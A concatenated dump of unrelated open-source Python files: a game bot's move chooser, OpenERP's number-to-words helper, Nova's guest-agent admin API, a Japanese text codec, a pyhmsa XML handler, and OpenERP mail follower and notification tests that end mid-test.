check_type(l, "Link") and l.direction == 0:
neighbours.append(n)
if y > 1:
n = self.game.board[x][y-2]
l = self.game.board[x][y-1]
if check_type(n, "Node") and (n.owner != us) and \
check_type(l, "Link") and l.direction == 1:
neighbours.append(n)
if y < self.game.H-2:
n = self.game.board[x][y+2]
l = self.game.board[x][y+1]
if check_type(n, "Node") and (n.owner != us) and \
check_type(l, "Link") and l.direction == 1:
neighbours.append(n)
return neighbours
def playMove(self):
"""
Plays the move -> here a random move
Returns the move (string %d %d %d)
"""
# get our player number
us = 0 if (self.game.players[0] is self) else 1
# build the list of the possible moves
moves = []
# capture node
# get the neighbours of the currently owned nodes and add them to the moves list
for node in self.game.playerNode[us]:
for n in self.neighbours(node.x, node.y, us):
moves.append("%d %d %d" % (CAPTURE, n.x, n.y))
# advanced moves
if self.advanced:
# destroy link
if self.game.playerEnergy[us] >= DESTROY_ENERGY:
linkCells = [(x, y) for x in range(self.game.L-1) for y in range(self.game.H-1) if check_type(self.game.board[x][y], "Link")]
if len(linkCells) > 0:
lx, ly = choice(linkCells)
moves.append("%d %d %d" % (DESTROY, lx, ly))
# create link
if self.game.playerEnergy[us] >= LINK_ENERGY:
blankCells = []
for x in range(1, self.game.L-1):
for y in range(1, self.game.H-1):
if self.game.board[x][y] is None:
if check_type(self.game.board[x-1][y], "Node") and \
check_type(self.game.board[x+1][y], "Node"):
blankCells.append((x, y, 0))
elif check_type(self.game.board[x][y-1], "Node") and \
check_type(self.game.board[x][y+1], "Node"):
blankCells.append((x, y, 1))
if len(blankCells) > 0:
cx, cy, d = choice(blankCells)
if d == 0:
moves.append("%d %d %d" % (LINK_H, cx, cy))
elif d == 1:
moves.append("%d %d %d" % (LINK_V, cx, cy))
# choose one possible move
if moves:
return choice(moves)
else:
# sometimes, we cannot move...
self.game.sendComment(self, "I am blocked... I cannot play...")
return "%d 0 0" % DO_NOTHING
|
gpl-3.0
|
bguillot/OpenUpgrade
|
openerp/tools/amount_to_text_en.py
|
441
|
5103
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from translate import _
_logger = logging.getLogger(__name__)
#-------------------------------------------------------------
#ENGLISH
#-------------------------------------------------------------
to_19 = ( 'Zero', 'One', 'Two', 'Three', 'Four', 'Five', 'Six',
'Seven', 'Eight', 'Nine', 'Ten', 'Eleven', 'Twelve', 'Thirteen',
'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen' )
tens = ( 'Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety')
denom = ( '',
'Thousand', 'Million', 'Billion', 'Trillion', 'Quadrillion',
'Quintillion', 'Sextillion', 'Septillion', 'Octillion', 'Nonillion',
'Decillion', 'Undecillion', 'Duodecillion', 'Tredecillion', 'Quattuordecillion',
'Sexdecillion', 'Septendecillion', 'Octodecillion', 'Novemdecillion', 'Vigintillion' )
def _convert_nn(val):
"""convert a value < 100 to English.
"""
if val < 20:
return to_19[val]
for (dcap, dval) in ((k, 20 + (10 * v)) for (v, k) in enumerate(tens)):
if dval + 10 > val:
if val % 10:
return dcap + '-' + to_19[val % 10]
return dcap
def _convert_nnn(val):
"""
Convert a value < 1000 to English. This is special-cased because it is the
level that dispatches to the < 100 helper; the higher levels are more
generic. Calling it directly also allows strings in the form of 'forty-five hundred'.
"""
word = ''
(mod, rem) = (val % 100, val // 100)
if rem > 0:
word = to_19[rem] + ' Hundred'
if mod > 0:
word += ' '
if mod > 0:
word += _convert_nn(mod)
return word
def english_number(val):
if val < 100:
return _convert_nn(val)
if val < 1000:
return _convert_nnn(val)
for (didx, dval) in ((v - 1, 1000 ** v) for v in range(len(denom))):
if dval > val:
mod = 1000 ** didx
l = val // mod
r = val - (l * mod)
ret = _convert_nnn(l) + ' ' + denom[didx]
if r > 0:
ret = ret + ', ' + english_number(r)
return ret
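# Illustrative sketch only (not part of the original module): expected outputs
# of the helpers above, given the to_19 / tens / denom tables in this file.
def _example_english_number():
    assert _convert_nn(42) == 'Forty-Two'
    assert _convert_nnn(345) == 'Three Hundred Forty-Five'
    assert english_number(1654) == 'One Thousand, Six Hundred Fifty-Four'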
def amount_to_text(number, currency):
number = '%.2f' % number
units_name = currency
list = str(number).split('.')
start_word = english_number(int(list[0]))
end_word = english_number(int(list[1]))
cents_number = int(list[1])
cents_name = (cents_number > 1) and 'Cents' or 'Cent'
return ' '.join(filter(None, [start_word, units_name, (start_word or units_name) and (end_word or cents_name) and 'and', end_word, cents_name]))
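# Illustrative sketch only (not part of the original module). The reference is
# captured here because the name amount_to_text is rebound by the generic
# dispatcher defined further down in this file.
_amount_to_text_en = amount_to_text

def _example_amount_to_text_en():
    assert _amount_to_text_en(1654.32, 'euro') == \
        'One Thousand, Six Hundred Fifty-Four euro and Thirty-Two Cents'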
#-------------------------------------------------------------
# Generic functions
#-------------------------------------------------------------
_translate_funcs = {'en' : amount_to_text}
#TODO: we should use the country AND language (ex: septante VS soixante dix)
#TODO: we should use en by default, but the translation func is yet to be implemented
def amount_to_text(nbr, lang='en', currency='euro'):
""" Converts an integer to its textual representation, using the language set in the context if any.
Example::
1654: thousands six cent cinquante-quatre.
"""
import openerp.loglevels as loglevels
# if nbr > 10000000:
# _logger.warning(_("Number too large '%d', can not translate it"))
# return str(nbr)
if not _translate_funcs.has_key(lang):
_logger.warning(_("no translation function found for lang: '%s'"), lang)
#TODO: (default should be en) same as above
lang = 'en'
return _translate_funcs[lang](abs(nbr), currency)
if __name__=='__main__':
from sys import argv
lang = 'nl'
if len(argv) < 2:
for i in range(1,200):
print i, ">>", int_to_text(i, lang)
for i in range(200,999999,139):
print i, ">>", int_to_text(i, lang)
else:
print int_to_text(int(argv[1]), lang)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
mmnelemane/nova
|
nova/api/openstack/compute/legacy_v2/contrib/agents.py
|
7
|
7919
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from nova.api.openstack import extensions
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import objects
from nova import utils
authorize = extensions.extension_authorizer('compute', 'agents')
class AgentController(object):
"""The agent is talking about guest agent.The host can use this for
things like accessing files on the disk, configuring networking,
or running other applications/scripts in the guest while it is
running. Typically this uses some hypervisor-specific transport
to avoid being dependent on a working network configuration.
Xen, VMware, and VirtualBox have guest agents,although the Xen
driver is the only one with an implementation for managing them
in openstack. KVM doesn't really have a concept of a guest agent
(although one could be written).
You can find the design of agent update in this link:
http://wiki.openstack.org/AgentUpdate
and find the code in nova.virt.xenapi.vmops.VMOps._boot_new_instance.
In this design We need update agent in guest from host, so we need
some interfaces to update the agent info in host.
You can find more information about the design of the GuestAgent in
the following link:
http://wiki.openstack.org/GuestAgent
http://wiki.openstack.org/GuestAgentXenStoreCommunication
"""
def index(self, req):
"""Return a list of all agent builds. Filter by hypervisor."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
hypervisor = None
agents = []
if 'hypervisor' in req.GET:
hypervisor = req.GET['hypervisor']
builds = objects.AgentList.get_all(context, hypervisor=hypervisor)
for agent_build in builds:
agents.append({'hypervisor': agent_build.hypervisor,
'os': agent_build.os,
'architecture': agent_build.architecture,
'version': agent_build.version,
'md5hash': agent_build.md5hash,
'agent_id': agent_build.id,
'url': agent_build.url})
return {'agents': agents}
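# Illustrative note (shape derived from the loop above; values are
# hypothetical): a typical response looks like
#     {"agents": [{"hypervisor": "xen", "os": "linux",
#                  "architecture": "x86", "version": "7.0",
#                  "md5hash": "add6bb58e139be103324d04d82d8f545",
#                  "agent_id": 1,
#                  "url": "http://example.com/agent.zip"}]}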
def update(self, req, id, body):
"""Update an existing agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
para = body['para']
url = para['url']
md5hash = para['md5hash']
version = para['version']
except (TypeError, KeyError) as ex:
msg = _("Invalid request body: %s") % ex
raise webob.exc.HTTPBadRequest(explanation=msg)
try:
utils.validate_integer(id, 'id')
utils.check_string_length(url, 'url', max_length=255)
utils.check_string_length(md5hash, 'md5hash', max_length=255)
utils.check_string_length(version, 'version', max_length=255)
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent = objects.Agent(context=context, id=id)
agent.obj_reset_changes()
agent.version = version
agent.url = url
agent.md5hash = md5hash
agent.save()
except exception.AgentBuildNotFound as ex:
raise webob.exc.HTTPNotFound(explanation=ex.format_message())
# NOTE(alex_xu): The agent_id should be integer that consistent with
# create/index actions. But parameter 'id' is string type that parsed
# from url. This is a bug, but because back-compatibility, it can't be
# fixed for v2 API. This will be fixed after v3 API feature exposed by
# micro-version in the future. lp bug #1333494
return {"agent": {'agent_id': id, 'version': version,
'url': url, 'md5hash': md5hash}}
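# Illustrative note (keys derived from the parsing above; values are
# hypothetical): the expected request body has the form
#     {"para": {"url": "http://example.com/agent.zip",
#               "md5hash": "add6bb58e139be103324d04d82d8f545",
#               "version": "7.0"}}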
def delete(self, req, id):
"""Deletes an existing agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
utils.validate_integer(id, 'id')
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent = objects.Agent(context=context, id=id)
agent.destroy()
except exception.AgentBuildNotFound as ex:
raise webob.exc.HTTPNotFound(explanation=ex.format_message())
def create(self, req, body):
"""Creates a new agent build."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks.
nova_context.require_admin_context(context)
try:
agent = body['agent']
hypervisor = agent['hypervisor']
os = agent['os']
architecture = agent['architecture']
version = agent['version']
url = agent['url']
md5hash = agent['md5hash']
except (TypeError, KeyError) as ex:
msg = _("Invalid request body: %s") % ex
raise webob.exc.HTTPBadRequest(explanation=msg)
try:
utils.check_string_length(hypervisor, 'hypervisor', max_length=255)
utils.check_string_length(os, 'os', max_length=255)
utils.check_string_length(architecture, 'architecture',
max_length=255)
utils.check_string_length(version, 'version', max_length=255)
utils.check_string_length(url, 'url', max_length=255)
utils.check_string_length(md5hash, 'md5hash', max_length=255)
except exception.InvalidInput as exc:
raise webob.exc.HTTPBadRequest(explanation=exc.format_message())
try:
agent_obj = objects.Agent(context=context)
agent_obj.hypervisor = hypervisor
agent_obj.os = os
agent_obj.architecture = architecture
agent_obj.version = version
agent_obj.url = url
agent_obj.md5hash = md5hash
agent_obj.create()
agent['agent_id'] = agent_obj.id
except exception.AgentBuildExists as ex:
raise webob.exc.HTTPConflict(explanation=ex.format_message())
return {'agent': agent}
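# Illustrative note (keys derived from the parsing above; values are
# hypothetical): the expected request body has the form
#     {"agent": {"hypervisor": "xen", "os": "linux", "architecture": "x86",
#                "version": "7.0", "url": "http://example.com/agent.zip",
#                "md5hash": "add6bb58e139be103324d04d82d8f545"}}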
class Agents(extensions.ExtensionDescriptor):
"""Agents support."""
name = "Agents"
alias = "os-agents"
namespace = "http://docs.openstack.org/compute/ext/agents/api/v2"
updated = "2012-10-28T00:00:00Z"
def get_resources(self):
resources = []
resource = extensions.ResourceExtension('os-agents',
AgentController())
resources.append(resource)
return resources
|
apache-2.0
|
SerCeMan/intellij-community
|
python/lib/Lib/encodings/euc_jis_2004.py
|
816
|
1051
|
#
# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_jp, codecs
import _multibytecodec as mbc
codec = _codecs_jp.getcodec('euc_jis_2004')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_jis_2004',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
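# Illustrative note (assumes this module is importable as
# encodings.euc_jis_2004 in the usual stdlib layout, so the codec search
# function can pick up getregentry()): the codec is then reachable by name,
# for example
#     u'\u30c6\u30b9\u30c8'.encode('euc_jis_2004')
# returns the EUC-JIS-2004 byte sequence for that string.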
|
apache-2.0
|
pyhmsa/pyhmsa
|
pyhmsa/fileformat/xmlhandler/condition/region.py
|
1
|
1491
|
"""
XML handler for region condition
"""
# Standard library modules.
# Third party modules.
# Local modules.
from pyhmsa.spec.condition.region import RegionOfInterest
from pyhmsa.fileformat.xmlhandler.condition.condition import _ConditionXMLHandler
# Globals and constants variables.
class RegionOfInterestXMLHandler(_ConditionXMLHandler):
def __init__(self, version):
super().__init__(RegionOfInterest, version)
def parse(self, element):
obj = super().parse(element)
subelement = element.find('StartChannel')
if subelement is None:
raise ValueError('Element StartChannel is missing')
start = self._parse_numerical_attribute(subelement)
subelement = element.find('EndChannel')
if subelement is None:
raise ValueError('Element EndChannel is missing')
end = self._parse_numerical_attribute(subelement)
obj.channels = (start, end)
return obj
def convert(self, obj):
element = super().convert(obj)
value = obj.start_channel
attrib = type('MockAttribute', (object,), {'xmlname': 'StartChannel'})
subelements = self._convert_numerical_attribute(value, attrib)
element.extend(subelements)
value = obj.end_channel
attrib = type('MockAttribute', (object,), {'xmlname': 'EndChannel'})
subelements = self._convert_numerical_attribute(value, attrib)
element.extend(subelements)
return element
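# Illustrative note (child element names taken from parse() above; the exact
# attribute layout of the numerical values is handled by
# _parse_numerical_attribute and is not reproduced here, channel numbers are
# hypothetical): a matching condition element is expected to look roughly like
#     <RegionOfInterest>
#         <StartChannel>556</StartChannel>
#         <EndChannel>636</EndChannel>
#     </RegionOfInterest>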
|
mit
|
CXQERP/ODOOERP
|
addons/mail/tests/test_mail_features.py
|
76
|
59326
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2012-TODAY OpenERP S.A. <http://openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.mail.mail_mail import mail_mail
from openerp.addons.mail.mail_thread import mail_thread
from openerp.addons.mail.tests.common import TestMail
from openerp.tools import mute_logger, email_split, html2plaintext
from openerp.tools.mail import html_sanitize
class test_mail(TestMail):
def test_000_alias_setup(self):
""" Test basic mail.alias setup works, before trying to use them for routing """
cr, uid = self.cr, self.uid
self.user_valentin_id = self.res_users.create(cr, uid,
{'name': 'Valentin Cognito', 'email': '[email protected]', 'login': 'valentin.cognito', 'alias_name': 'valentin.cognito'})
self.user_valentin = self.res_users.browse(cr, uid, self.user_valentin_id)
self.assertEquals(self.user_valentin.alias_name, self.user_valentin.login, "Login should be used as alias")
self.user_pagan_id = self.res_users.create(cr, uid,
{'name': 'Pagan Le Marchant', 'email': '[email protected]', 'login': '[email protected]', 'alias_name': '[email protected]'})
self.user_pagan = self.res_users.browse(cr, uid, self.user_pagan_id)
self.assertEquals(self.user_pagan.alias_name, 'plmarchant', "If login is an email, the alias should keep only the local part")
self.user_barty_id = self.res_users.create(cr, uid,
{'name': 'Bartholomew Ironside', 'email': '[email protected]', 'login': 'b4r+_#_R3wl$$', 'alias_name': 'b4r+_#_R3wl$$'})
self.user_barty = self.res_users.browse(cr, uid, self.user_barty_id)
self.assertEquals(self.user_barty.alias_name, 'b4r+_-_r3wl-', 'Disallowed chars should be replaced by hyphens')
def test_00_followers_function_field(self):
""" Tests designed for the many2many function field 'follower_ids'.
We will test to perform writes using the many2many commands 0, 3, 4,
5 and 6. """
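# For reference (standard OpenERP x2many write commands used below):
#   (0, 0, values)  create a new record and link it
#   (3, id)         unlink the relation, keep the record
#   (4, id)         link an existing record
#   (5, 0)          unlink all linked records
#   (6, 0, ids)     replace the whole list of linked records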
cr, uid, user_admin, partner_bert_id, group_pigs = self.cr, self.uid, self.user_admin, self.partner_bert_id, self.group_pigs
# Data: create 'disturbing' values in mail.followers: same res_id, other res_model; same res_model, other res_id
group_dummy_id = self.mail_group.create(cr, uid,
{'name': 'Dummy group'}, {'mail_create_nolog': True})
self.mail_followers.create(cr, uid,
{'res_model': 'mail.thread', 'res_id': self.group_pigs_id, 'partner_id': partner_bert_id})
self.mail_followers.create(cr, uid,
{'res_model': 'mail.group', 'res_id': group_dummy_id, 'partner_id': partner_bert_id})
# Pigs just created: should be only Admin as follower
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([user_admin.partner_id.id]), 'Admin should be the only Pigs fan')
# Subscribe Bert through a '4' command
group_pigs.write({'message_follower_ids': [(4, partner_bert_id)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id, user_admin.partner_id.id]), 'Bert and Admin should be the only Pigs fans')
# Unsubscribe Bert through a '3' command
group_pigs.write({'message_follower_ids': [(3, partner_bert_id)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([user_admin.partner_id.id]), 'Admin should be the only Pigs fan')
# Set followers through a '6' command
group_pigs.write({'message_follower_ids': [(6, 0, [partner_bert_id])]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id]), 'Bert should be the only Pigs fan')
# Add a follower created on the fly through a '0' command
group_pigs.write({'message_follower_ids': [(0, 0, {'name': 'Patrick Fiori'})]})
partner_patrick_id = self.res_partner.search(cr, uid, [('name', '=', 'Patrick Fiori')])[0]
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertEqual(follower_ids, set([partner_bert_id, partner_patrick_id]), 'Bert and Patrick should be the only Pigs fans')
# Finally, unlink through a '5' command
group_pigs.write({'message_follower_ids': [(5, 0)]})
group_pigs.refresh()
follower_ids = set([follower.id for follower in group_pigs.message_follower_ids])
self.assertFalse(follower_ids, 'Pigs group should not have fans anymore')
# Test dummy data has not been altered
fol_obj_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.thread'), ('res_id', '=', self.group_pigs_id)])
follower_ids = set([follower.partner_id.id for follower in self.mail_followers.browse(cr, uid, fol_obj_ids)])
self.assertEqual(follower_ids, set([partner_bert_id]), 'Bert should be the follower of dummy mail.thread data')
fol_obj_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.group'), ('res_id', '=', group_dummy_id)])
follower_ids = set([follower.partner_id.id for follower in self.mail_followers.browse(cr, uid, fol_obj_ids)])
self.assertEqual(follower_ids, set([partner_bert_id, user_admin.partner_id.id]), 'Bert and Admin should be the followers of dummy mail.group data')
def test_05_message_followers_and_subtypes(self):
""" Tests designed for the subscriber API as well as message subtypes """
cr, uid, user_admin, user_raoul, group_pigs = self.cr, self.uid, self.user_admin, self.user_raoul, self.group_pigs
# Data: message subtypes
self.mail_message_subtype.create(cr, uid, {'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.group'})
self.mail_message_subtype.create(cr, uid, {'name': 'mt_other_def', 'default': True, 'res_model': 'crm.lead'})
self.mail_message_subtype.create(cr, uid, {'name': 'mt_all_def', 'default': True, 'res_model': False})
mt_mg_nodef = self.mail_message_subtype.create(cr, uid, {'name': 'mt_mg_nodef', 'default': False, 'res_model': 'mail.group'})
mt_all_nodef = self.mail_message_subtype.create(cr, uid, {'name': 'mt_all_nodef', 'default': False, 'res_model': False})
default_group_subtypes = self.mail_message_subtype.search(cr, uid, [('default', '=', True), '|', ('res_model', '=', 'mail.group'), ('res_model', '=', False)])
# ----------------------------------------
# CASE1: test subscriptions with subtypes
# ----------------------------------------
# Do: subscribe Raoul, should have default subtypes
group_pigs.message_subscribe_users([user_raoul.id])
group_pigs.refresh()
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Raoul follows default subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set(default_group_subtypes),
'message_subscribe: Raoul subscription subtypes are incorrect, should be all default ones')
# Do: subscribe Raoul with specified new subtypes
group_pigs.message_subscribe_users([user_raoul.id], subtype_ids=[mt_mg_nodef])
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Test: 2 lines in mail.followers (no duplicate for Raoul)
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
])
self.assertEqual(len(fol_ids), 2,
'message_subscribe: subscribing an already-existing follower should not create new entries in mail.followers')
# Test: Raoul follows only specified subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef]),
'message_subscribe: Raoul subscription subtypes are incorrect, should be only specified')
# Do: Subscribe Raoul without specified subtypes: should not erase existing subscription subtypes
group_pigs.message_subscribe_users([user_raoul.id, user_raoul.id])
group_pigs.message_subscribe_users([user_raoul.id])
group_pigs.refresh()
# Test: 2 followers (Admin and Raoul)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(set(follower_ids), set([user_raoul.partner_id.id, user_admin.partner_id.id]),
'message_subscribe: Admin and Raoul should be the only 2 Pigs fans')
# Test: Raoul follows default subtypes
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id),
('partner_id', '=', user_raoul.partner_id.id)
])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef]),
'message_subscribe: Raoul subscription subtypes are incorrect, should be only specified')
# Do: Unsubscribe Raoul twice through message_unsubscribe_users
group_pigs.message_unsubscribe_users([user_raoul.id, user_raoul.id])
group_pigs.refresh()
# Test: 1 follower (Admin)
follower_ids = [follower.id for follower in group_pigs.message_follower_ids]
self.assertEqual(follower_ids, [user_admin.partner_id.id], 'Admin must be the only Pigs fan')
# Test: 1 lines in mail.followers (no duplicate for Raoul)
fol_ids = self.mail_followers.search(cr, uid, [
('res_model', '=', 'mail.group'),
('res_id', '=', self.group_pigs_id)
])
self.assertEqual(len(fol_ids), 1,
'message_subscribe: group should have only 1 entry in mail.follower for 1 follower')
# Do: subscribe Admin with subtype_ids
group_pigs.message_subscribe_users([uid], [mt_mg_nodef, mt_all_nodef])
fol_ids = self.mail_followers.search(cr, uid, [('res_model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id), ('partner_id', '=', user_admin.partner_id.id)])
fol_obj = self.mail_followers.browse(cr, uid, fol_ids)[0]
fol_subtype_ids = set([subtype.id for subtype in fol_obj.subtype_ids])
self.assertEqual(set(fol_subtype_ids), set([mt_mg_nodef, mt_all_nodef]), 'subscription subtypes are incorrect')
# ----------------------------------------
# CASE2: test mail_thread fields
# ----------------------------------------
subtype_data = group_pigs._get_subscription_data(None, None)[group_pigs.id]['message_subtype_data']
self.assertEqual(set(subtype_data.keys()), set(['Discussions', 'mt_mg_def', 'mt_all_def', 'mt_mg_nodef', 'mt_all_nodef']), 'mail.group available subtypes incorrect')
self.assertFalse(subtype_data['Discussions']['followed'], 'Admin should not follow Discussions in pigs')
self.assertTrue(subtype_data['mt_mg_nodef']['followed'], 'Admin should follow mt_mg_nodef in pigs')
self.assertTrue(subtype_data['mt_all_nodef']['followed'], 'Admin should follow mt_all_nodef in pigs')
def test_11_notification_url(self):
""" Tests designed to test the URL added in notification emails. """
cr, uid, group_pigs = self.cr, self.uid, self.group_pigs
# Test URL formatting
base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# Partner data
partner_raoul = self.res_partner.browse(cr, uid, self.partner_raoul_id)
partner_bert_id = self.res_partner.create(cr, uid, {'name': 'bert'})
partner_bert = self.res_partner.browse(cr, uid, partner_bert_id)
# Mail data
mail_mail_id = self.mail_mail.create(cr, uid, {'state': 'exception'})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
# Test: link for nobody -> None
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail)
self.assertEqual(url, None,
'notification email: mails not send to a specific partner should not have any URL')
# Test: link for partner -> None
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_bert)
self.assertEqual(url, None,
'notification email: mails send to a not-user partner should not have any URL')
# Test: link for user -> signin
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
# Test: link for user -> with model and res_id
mail_mail_id = self.mail_mail.create(cr, uid, {'model': 'mail.group', 'res_id': group_pigs.id})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
self.assertIn('model=mail.group', url,
'notification email: link should contain the model when having not notification email on a record')
self.assertIn('res_id=%s' % group_pigs.id, url,
'notification email: link should contain the res_id when having not notification email on a record')
# Test: link for user -> with model and res_id
mail_mail_id = self.mail_mail.create(cr, uid, {'notification': True, 'model': 'mail.group', 'res_id': group_pigs.id})
mail = self.mail_mail.browse(cr, uid, mail_mail_id)
url = mail_mail._get_partner_access_link(self.mail_mail, cr, uid, mail, partner=partner_raoul)
self.assertIn(base_url, url,
'notification email: link should contain web.base.url')
self.assertIn('db=%s' % cr.dbname, url,
'notification email: link should contain database name')
self.assertIn('action=mail.action_mail_redirect', url,
'notification email: link should contain the redirect action')
self.assertIn('login=%s' % partner_raoul.user_ids[0].login, url,
'notification email: link should contain the user login')
self.assertIn('message_id=%s' % mail.mail_message_id.id, url,
'notification email: link based on message should contain the mail_message id')
self.assertNotIn('model=mail.group', url,
'notification email: link based on message should not contain model')
self.assertNotIn('res_id=%s' % group_pigs.id, url,
'notification email: link based on message should not contain res_id')
@mute_logger('openerp.addons.mail.mail_thread', 'openerp.models')
def test_12_inbox_redirection(self):
""" Tests designed to test the inbox redirection of emails notification URLs. """
cr, uid, user_admin, group_pigs = self.cr, self.uid, self.user_admin, self.group_pigs
model, act_id = self.ir_model_data.get_object_reference(cr, uid, 'mail', 'action_mail_inbox_feeds')
# Data: post a message on pigs
msg_id = self.group_pigs.message_post(body='My body', partner_ids=[self.partner_bert_id], type='comment', subtype='mail.mt_comment')
# No specific parameters -> should redirect to Inbox
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
